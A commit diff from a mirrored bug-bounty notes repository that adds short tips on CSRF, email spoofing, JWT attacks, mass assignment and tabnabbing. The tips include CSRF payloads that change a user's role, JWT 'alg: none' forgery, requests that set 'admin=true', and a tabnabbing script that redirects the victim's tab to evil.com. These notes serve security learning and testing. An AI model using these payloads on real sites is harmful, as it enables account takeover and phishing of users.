ch0ic3/AllAboutBugBounty
1
0
Fork 0
mirror of https://github.com/daffainfo/AllAboutBugBounty.git synced 2024-12-18 10:26:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Added 4 tips to misc folders

Browse Source
This commit is contained in:
MD15 2021-02-09 17:29:07 +07:00
parent 8c337501d1
commit 614ff9f093
7 changed files with 143 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

43
Bypass/Bypass CSRF.md → Cross Site Request Forgery.md
View File

@ -1,4 +1,45 @@
# Bypass CSRF Token
# Cross Site Request Forgery (CSRF)
## Introduction
Cross-Site Request Forgery (CSRF/XSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated
## How to Find
1. HTML GET Method
```html
<a href="http://www.example.com/api/setusername?username=uname">Click Me</a>
```
2. HTML POST Method
```html
<form action="http://www.example.com/api/setusername" enctype="text/plain" method="POST">
<input name="username" type="hidden" value="uname" />
<input type="submit" value="Submit Request" />
</form>
```
3. JSON GET Method
```html
<script>
var xhr = new XMLHttpRequest();
xhr.open("GET", "http://www.example.com/api/currentuser");
xhr.send();
</script>
```
4. JSON POST Method
```html
<script>
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://www.example.com/api/setrole");
xhr.withCredentials = true;
xhr.setRequestHeader("Content-Type", "application/json;charset=UTF-8");
xhr.send('{"role":admin}');
</script>
```
## Bypass CSRF Token
1. Change single character
```
POST /register HTTP/1.1

2
Exposed Source Code.md
View File

@ -2,8 +2,8 @@
## **Introduction**
Source code intended to be kept server-side can sometimes end up being disclosed to users. Such code may contain sensitive information such as database passwords and secret keys, which may help malicious users formulate attacks against the application.
## **How to Find**
## **How to Find**
1. Exposed Git folder
```
https://site.com/.git

16
Misc/Email Spoofing.md Normal file
View File

@ -0,0 +1,16 @@
# Email Spoofing
## Introduction
Email spoofing is a technique used in spam and phishing attacks to trick users into thinking a message came from a person or entity they either know or can trust. In spoofing attacks, the sender forges email headers so that client software displays the fraudulent sender address, which most users take at face value.
## How to Find
1. Check the SPF records, if the website don't have a SPF record, the website must be vulnerable to email spoofing
```
v=spf1 include:_spf.google.com ~all
```
2. Check the DMARC records, if the website don't have a DMARC record or the value of tag policy is `none`, the website must be vulnerable to email spoofing
```
v=DMARC1; p=none; rua=mailto:dmarc@yourdomain.com
```
Reference:
- [Hackerone #1071521](https://hackerone.com/reports/1071521)

22
Misc/JWT Vulnerabilities.md Normal file
View File

@ -0,0 +1,22 @@
# JWT Vulnerabilities
## Introduction
JSON Web Token (JWT) is an open standard (RFC 7519) that defines a compact and self-contained way for securely transmitting information between parties as a JSON object.
## How to Exploit
1. Modify the algorithm to "none" algorithm
```
{
"alg": "none",
"typ": "JWT"
}
```
2. Modify the algorithm RS256 to HS256
If you change the algorithm from RS256 to HS256, the backend code uses the public key as the secret key and then uses the HS256 algorithm to verify the signature.
3. Bruteforce HS256
the HS256 key strength is weak, it can be directly brute-forced, such as using the secret string as a key in the PyJWT library sample code.
Reference:
- [Hacking JSON Web Token (JWT)](https://medium.com/101-writeups/hacking-json-web-token-jwt-233fe6c862e6)

33
Misc/Mass Assignment.md Normal file
View File

@ -0,0 +1,33 @@
# Mass Assignment Attack
## Introduction
Occurs when an app allows a user to manually add parameters in an HTTP Request & the app process value of these parameters when processing the HTTP Request & it affects the response that is returned to the user. Usually occurs in Ruby on Rails / NodeJS
## How to Exploit
- Normal request
```
POST /editdata
Host: vuln.com
username=daffa
```
```
HTTP/1.1 200 OK
...
username=daffa&admin=false
```
- Modified Request
```
POST /editdata
Host: vuln.com
username=daffa&admin=true
```
```
HTTP/1.1 200 OK
...
username=daffa&admin=true
```

23
Misc/Tabnabbing.md Normal file
View File

@ -0,0 +1,23 @@
# Tabnabbing
## Introduction
When you open a link in a new tab ( target="_blank" ), the page that opens in a new tab can access the initial tab and change it's location using the window.opener property.
## How to Find
```html
<a href="..." target="_blank" rel="" />
<a href="..." target="_blank" />
```
## How to Exploit
1. Attacker posts a link to a website under his control that contains the following JS code:
```html
<html>
<script>
if (window.opener) window.opener.parent.location.replace('http://evil.com');
if (window.parent != window) window.parent.location.replace('http://evil.com');
</script>
</html>
```
2. He tricks the victim into visiting the link, which is opened in the browser in a new tab.
3. At the same time the JS code is executed and the background tab is redirected to the website evil.com, which is most likely a phishing website.

7
README.md
View File

@ -3,6 +3,7 @@ These are my bug bounty notes that I have gathered from various sources, you can
## List
- [Business Logic Errors](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Business%20Logic%20Errors.md)
- [Cross Site Request Forgery (CSRF)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Cross%20Site%20Request%20Forgery.md)
- [Cross Site Scripting (XSS)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Cross%20Site%20Scripting.md)
- [Denial of Service (DoS)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Denial%20Of%20Service.md)
- [Exposed Source Code](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Denial%20Of%20Service.md)
@ -13,7 +14,6 @@ These are my bug bounty notes that I have gathered from various sources, you can
## List Bypass
- [Bypass 2FA](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%202FA.md)
- [Bypass 403](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20403.md)
- [Bypass CSRF](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20CSRF.md)
- [Bypass Captcha](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20Captcha.md)
- [Bypass File Upload](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20File%20Upload.md)
- [Bypass Rate Limit](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20Rate%20Limit.md)
@ -27,7 +27,12 @@ These are my bug bounty notes that I have gathered from various sources, you can
## Miscellaneous
- [Account Takeover](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Account%20Takeover.md)
- [Broken Link Hijacking](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Broken%20Link%20Hijacking.md)
- [Email Spoofing](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Email%20Spoofing.md)
- [JWT Vulnerabilities](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/JWT%20Vulnerabilities.md)
- [Mass Assignment](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Mass%20Assignment.md)
- [Password Reset Flaws](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Password%20Reset%20Flaws.md)
- [Tabnabbing](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Tabnabbing.md)
- [Unauthenticated Jira CVE](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Unauthenticated%20Jira%20CVE.md)
## Reconnaissance